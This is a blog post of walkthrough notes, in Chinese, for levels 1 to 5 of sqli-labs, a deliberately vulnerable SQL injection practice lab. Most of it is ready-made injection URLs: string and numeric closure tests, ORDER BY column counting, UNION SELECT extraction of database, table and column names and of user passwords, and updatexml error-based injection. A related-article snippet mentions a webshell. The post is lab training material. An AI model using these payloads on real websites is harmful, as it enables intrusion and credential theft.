首页 > 数据库 >sqli-labs less1~less5

sqli-labs less1~less5

时间:2022-11-30 23:33:17浏览次数:44  
标签:http cn Less buuoj less1 labs sqli node4 id

less1

#判断出为字符型注入
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1 and 1=1--+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1 and 1=2--+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1'  and 1=1--+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1'  and 1=2--+  
#3个字段
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1' order by 3 --+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1' order by 4 --+
#2,3回显
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,2,3 --+ 
#爆库名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,database(),group_concat(schema_name) from information_schema.schemata --+ 
#爆表名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+ 
#爆字段名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+ 
#爆用户密码
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users --+ 

less2

#判断为数字型注入
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 and 1=1 --+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 and 1=2 --+
#判断字段数
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 order by 3 --+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 order by 4 --+
#判断回显
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,2,3 --+
#爆库名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,database(),group_concat(schema_name) from information_schema.schemata --+
#爆表名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
#爆字段名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
#爆用户密码
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,group_concat(username),group_concat(password) from users --+

less3

#判断需闭合的符号为')
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-3/?id=1'
其它和less1一样

less4

#得到闭合符号为")
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-4/?id=1"
#其它和less1一样

less5

#报错注入(最大显示32位,可用limit来限制)
#爆库名
http://c8a4ecbe-6321-4815-9c48-27ddf65a8287.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) --+
#爆表名
http://c8a4ecbe-6321-4815-9c48-27ddf65a8287.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+
#爆字段名
http://c8a4ecbe-6321-4815-9c48-27ddf65a8287.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) --+
#爆用户名/密码 这里的username可以换成password,但有最大显示32位的限制,可用limit,更改7,1的7即可
http://9bc0dfde-0f20-40ad-9491-7a59da4bc9fa.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1) --+

标签:http,cn,Less,buuoj,less1,labs,sqli,node4,id
From: https://www.cnblogs.com/Error1s/p/16936400.html

相关文章

  • Upload-labs 18 条件竞争——通关
    访问目标站点,提示如下图所示查看源码思路:上传shell.php.7z图片木马配合解析漏洞进行getshell实验步骤:图片中php一句话木马代码:​​<?phpfputs(fopen('shell2.php','w'),'......
  • android的sqlite获取当天数据的sql语句
    SELECTcount(*)FROM表名WHEREstrftime('%m-%d','now','localtime')=strftime('%m-%d',表中时间字段)1以上查询语句只需修改where字符串增以增加更多限制条件。“......
  • Web安全基础 - LFI Labs
    Web安全基础-LFILabs本实验来自于https://github.com/paralax/lfi-labs做到一半了才发现BUUCTF上有,可以参考本篇做一下更有成就感CMDCMD-1该关卡直接执行Get方法cm......
  • 【iOS-Cocos2d游戏开发之十九】游戏数据存储的四种常用方式NSKeyedArchiver/NSUserDef
    ​​ 李华明Himi ​​​原创,转载务必在明显处注明      OK,今天Himi介绍游戏存储这一块,在Android游戏开发中Himi介绍了好几种保存的方式和形式,那么在iOS中也有......
  • 对比分析PDO和Mysqli
    php操作mysql数据库,大家都知道有三种驱动,mysqlmysqlipdo,其中mysql在php7之后被废除了。不是本文重点。咱现在来分析一下mysqli和PDO的区别,下面一张表用来说明他们的区别 ......
  • sqli-labs less-1
    为了拿到完整的用户和密码0x01判断注入点Payload:数字型注入没有变化--起着注释的作用,将后面的语句注释掉,+则代表空格http://127.0.0.1/sqli-labs-master/Less-1/?......
  • 【Android游戏开发十三】(保存游戏数据 [下文])详解SQLite存储方式,并把SQLite的数据库
    ​​ 李华明Himi ​​​原创,转载务必在明显处注明: 很多童鞋说我的代码运行后,点击home或者back后会程序异常,如果你也这样遇到过,那么你肯定没有仔细读完Himi的博文,第十九......
  • C语言abs和labs函数详解和示例
    文章目录​​1、包含头文件​​​​2、函数声明​​​​3、功能说明​​​​4、示例​​​​5、其它说明​​​​6、获取视频教程​​​​7、版权声明​​C语言提供了一系......
  • 玩转SQLite-11:C语言高效API之sqlite3_prepare系列函数
    SQLite是一个跨平台的轻量级数据库,支持C/C++开发,可用于嵌入式中,关于C/C++使用SQLite的简单实例,之前​​这篇文章​​,已经介绍过一种简单的使用方式。本篇来介绍另一种更加高......
  • xsslabs通关教程
    通过练习xsslabs可以熟练掌握XSS攻击的技巧有助于更加深刻的理解XSS攻击的运用与流程xsslabs下载地址:https://codeload.github.com/do0dl3/xss-labs/zip/refs/heads/mast......